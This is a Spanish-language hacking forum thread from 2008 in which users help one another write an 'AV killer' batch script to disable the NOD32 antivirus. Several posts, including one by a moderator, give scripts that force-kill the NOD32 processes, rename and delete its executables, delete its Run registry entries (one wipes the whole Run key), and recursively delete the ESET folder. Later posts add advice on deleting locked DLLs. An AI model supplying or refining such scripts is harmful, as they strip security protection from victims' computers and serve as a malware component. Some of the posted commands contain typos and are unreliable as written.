hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
19 de Noviembre de 2008, 02:50:15
Noticias: Caracteres maximos de las firmas
Para ver este enlace Registrate o Inicia Sesion
> leer

+  Foros pOrtal Hacker
|-+  Programacion
| |-+  Programación en general
| | |-+  Batch (Moderadores: HolyKnight, PyXOLo)
| | | |-+  Duada sobre avkiller para nod32
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Duada sobre avkiller para nod32  (Leído 383 veces)
elfuede
Recien llegado
*
Desconectado Desconectado

Mensajes: 8


Ver Perfil
« : 19 de Julio de 2008, 08:15:35 »

Que tal colegas? espero q todo muy bien.
Voy a mi duda, he creado un av killer en batch para nod32
pero me gustaria saber la direccion de las claves en el registro sobre este AV
y como podria indicarle a mi programa para q las elemine.
Desde ya muchas gracias
Los saludo atentamente Smiley
En línea
ivansillo
Recien llegado
*
Desconectado Desconectado

Mensajes: 19



Ver Perfil
« Respuesta #1 : 19 de Julio de 2008, 01:56:37 »

HKLM/software/microsoft/windows/currentversion/run

espero te sirva mi informacion

*no recuerdo como se borra exactamente el registro pero es con "reg del"

pd. cuanto termines tu av killer postealo porque me seria de gran utilidad ya que yo intente hacer uno pero no me salio muy bien (esque soy novato)

gracias de antemano y suerte Grin
En línea
onixessk8
NZ1
*
Desconectado Desconectado

Mensajes: 98


BOB MARLEY


Ver Perfil
« Respuesta #2 : 19 de Julio de 2008, 02:37:09 »

OLA
El nod32 tiene un problema y es que cuanod cierras el proceso nod32kui.exe no se vuelve a abrir pero!queda uno en segundo plano que es nod32krn.exe quer si lo cierras se vuelve a abrir entonces..yo lo que hago es cerrarlo y cambiarle el nombre inmediatamente y lo eliminas esta en: C:\Archivos de programa\ESET\nod32krn.exe
Luego lo borras del registro que te voy a pasar donde es:
HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
creo que es el registro que han puesto antes..
el code seria algo asi..

Código:
@echo off
taskkill /f /im nod32kui.exe
taskkill /f /im nod32krn.exe
ren "%programfiles%\eset\nod32kui.exe" ola.exe
del /q /s /f "%programfiles%\eset\ola.exe"
::Esto no se si esta bien porque no contorlo mucho los resgistros :S
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"nod32kui.exe /ve /f
::Y luego si quieres borras toda la carpeta del nod32
del /f /s /q "%programfiles%\ESET\*.*"
echo adios nod32!
pause
exit

Bueno creo que es asi lo e hecho en momento corregidlo si falla algo! Wink
saludosss


« Última modificación: 19 de Julio de 2008, 02:38:00 por onixessk8 » En línea
ivansillo
Recien llegado
*
Desconectado Desconectado

Mensajes: 19



Ver Perfil
« Respuesta #3 : 19 de Julio de 2008, 03:19:37 »

Citar
yo creoque el code ya terminado y corregido (creo que lo corregi bien) quedaria asi:

Citar
@echo off
taskkill /im nod32kui.exe /f
taskkill /im nod32krn.exe /f
taskkill /im nvsvc32.exe  /f
ren "%programfiles%\eset\nod32kui.exe" ola.exe
del /q /s /f "%programfiles%\eset\ola.exe"
reg delete "HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" /v nod32kui.exe /f
rd "%programfiles%\ESET" /s /q

espero que funcione bien  Wink
suerte Grin


en este mensaje no sale una de las lineas completas
mejor bajense el .bat desde el link que puse mas abajo
« Última modificación: 19 de Julio de 2008, 03:46:17 por ivansillo » En línea
PyXOLo
Moderador
*****
Desconectado Desconectado

Mensajes: 358


Ramuto Team # Participa ;)


Ver Perfil
« Respuesta #4 : 19 de Julio de 2008, 03:26:54 »

Bien hecho alex pero...

Citar
@echo off
taskkill /f /im nod32kui.exe
taskkill /f /im nod32krn.exe
ren "%programfiles%\eset\nod32kui.exe" "%programfiles%\eset\wrong.pyx"
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
::Así borras todo el RUN
::Y luego si quieres borras toda la carpeta del nod32
del /f /s /q "%programfiles%\ESET\*.*"
goto EOF
« Última modificación: 19 de Julio de 2008, 03:47:59 por PyXOLo » En línea

ivansillo
Recien llegado
*
Desconectado Desconectado

Mensajes: 19



Ver Perfil
« Respuesta #5 : 19 de Julio de 2008, 03:36:45 »

no me llamo alex Undecided, y el error que tuve fue porque se me olvido poner lo demas  Grin

perdon
En línea
PyXOLo
Moderador
*****
Desconectado Desconectado

Mensajes: 358


Ramuto Team # Participa ;)


Ver Perfil
« Respuesta #6 : 19 de Julio de 2008, 03:40:20 »

no me llamo alex Undecided, y el error que tuve fue porque se me olvido poner lo demas  Grin

perdon

perdon, pero quise citar a onixessk8, que él sí se llama Alex xD
En línea

onixessk8
NZ1
*
Desconectado Desconectado

Mensajes: 98


BOB MARLEY


Ver Perfil
« Respuesta #7 : 19 de Julio de 2008, 03:42:59 »

Ok gracias por corregir esque no tenia ganas de pensar..xD y lo hice asi de una!xD
saludos espero que te halla servido
En línea
ivansillo
Recien llegado
*
Desconectado Desconectado

Mensajes: 19



Ver Perfil
« Respuesta #8 : 19 de Julio de 2008, 03:44:03 »

ok perdon Grin

mi codigo del av killer esta un poco largo y no sale en el mensaje la linea completa, mejor bajate el .bat lo acabo de subir y ahi me corrigen si tiene algo mal (espero que no este mal)


Para ver este enlace Registrate o Inicia Sesion
« Última modificación: 19 de Julio de 2008, 03:44:53 por ivansillo » En línea
onixessk8
NZ1
*
Desconectado Desconectado

Mensajes: 98


BOB MARLEY


Ver Perfil
« Respuesta #9 : 19 de Julio de 2008, 03:46:47 »

Una cosa no entiendo:S pyxolo porque le pones de nombre wrong.pyx y luego eliminas el ola.exe.. Undecided
y si borras todo el run no se borran todas las entradas del regsitro run?si no quiero borrarlo todo como se debe poner para borrar solo ese?
saludoss
En línea
PyXOLo
Moderador
*****
Desconectado Desconectado

Mensajes: 358


Ramuto Team # Participa ;)


Ver Perfil
« Respuesta #10 : 19 de Julio de 2008, 03:47:11 »

Ahora que me doy cuenta....

del /f /s /q "%programfiles%\ESET\*.*"

No podrás borrar todos los archivos porque existen .dlls que no se pueden borrar. Primero debes renombrarlas y luego proceder a borrarlas Wink para luego poder usar el rd si se quiere
En línea

onixessk8
NZ1
*
Desconectado Desconectado

Mensajes: 98


BOB MARLEY


Ver Perfil
« Respuesta #11 : 19 de Julio de 2008, 03:51:01 »

ya.. pero con que elimines algunos te sobra para que no funcione!  Grin
saluddosss
En línea
PyXOLo
Moderador
*****
Desconectado Desconectado

Mensajes: 358


Ramuto Team # Participa ;)


Ver Perfil
« Respuesta #12 : 19 de Julio de 2008, 04:04:58 »

Una cosa no entiendo:S pyxolo porque le pones de nombre wrong.pyx y luego eliminas el ola.exe.. Undecided
y si borras todo el run no se borran todas las entradas del regsitro run?si no quiero borrarlo todo como se debe poner para borrar solo ese?
saludoss

No me di cuenta de modificar el del del archivo ola.exe que, además es innecesario.

Sobre lo de reg delete seria como reg add pero con delete....

Ejemplo:
Citar
reg delete HKKL\Software\Microsoft\Windows\CurrentVersion\Run /v subclave /f

Por ejemplo si no supiéramos el nombre de la subclave podrías hacer una cosa más compleja con reg export for y set Wink
En línea

elfuede
Recien llegado
*
Desconectado Desconectado

Mensajes: 8


Ver Perfil
« Respuesta #13 : 19 de Julio de 2008, 05:32:58 »

gracias por la ayuda muchachos
voy a intntar probar haber q sale
si se les ocurre algun otro ejemplo posteen
gracias
En línea
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online